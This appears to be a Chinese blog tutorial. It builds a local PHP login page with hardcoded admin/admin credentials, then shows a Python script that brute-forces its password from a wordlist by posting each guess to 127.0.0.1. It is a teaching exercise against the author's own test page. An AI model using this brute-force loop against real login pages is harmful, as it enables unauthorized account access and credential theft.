一、创建php文件
首先要新建一个PHP登陆表单页面用来测试,样式如下:
代码如下:
<!DOCTYPE html>
<html>
<head>
<title>Testing Script Brute Force in Python</title>
<meta charset="utf-8">
</head>
<body>
<?php
if(isset($_POST['sub'])){
$input1 = $_POST['input1'];
$input2 = $_POST['input2'];
if ( $input1 == "admin" and $input2 == "admin"){
echo "Login success!";
}else{
echo "login failed!";
}
}
?>
<form method="POST">
Username:<input type="text" name="input1">
Password:<input type="text" name="input2">
<input type="submit" name="sub">
</form>
</body>
</html>
二、测试
通过工具找出Form的字段,这里需要用到toggle httpFox插件,这是一款非常好用的Firefox插件,不过由于我的firefox版本太高,并不支持。
三、编写Python代码
# Author = 蜗牛博客
# Blog = www.snailtoday.com
import requests
url = 'http://127.0.0.1/form.php'
arq = open('password.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url,data={'input1':'admin','input2':password,'sub':'submit'})
content = http.content
if b"Login success!" in content:
print ("=========[+] PASSWORD CRACKED:"+password+"=======")
break
else:
print ("[-] Password invalid:" + password )
运行时出现a bytes-like object is required, not 'str' 的错误提示,将if "Login success!" in content改成if b"Login success!" in content,问题解决。
原载:蜗牛博客
网址:http://www.snailtoday.com
尊重版权,转载时务必以链接形式注明作者和原始出处及本声明。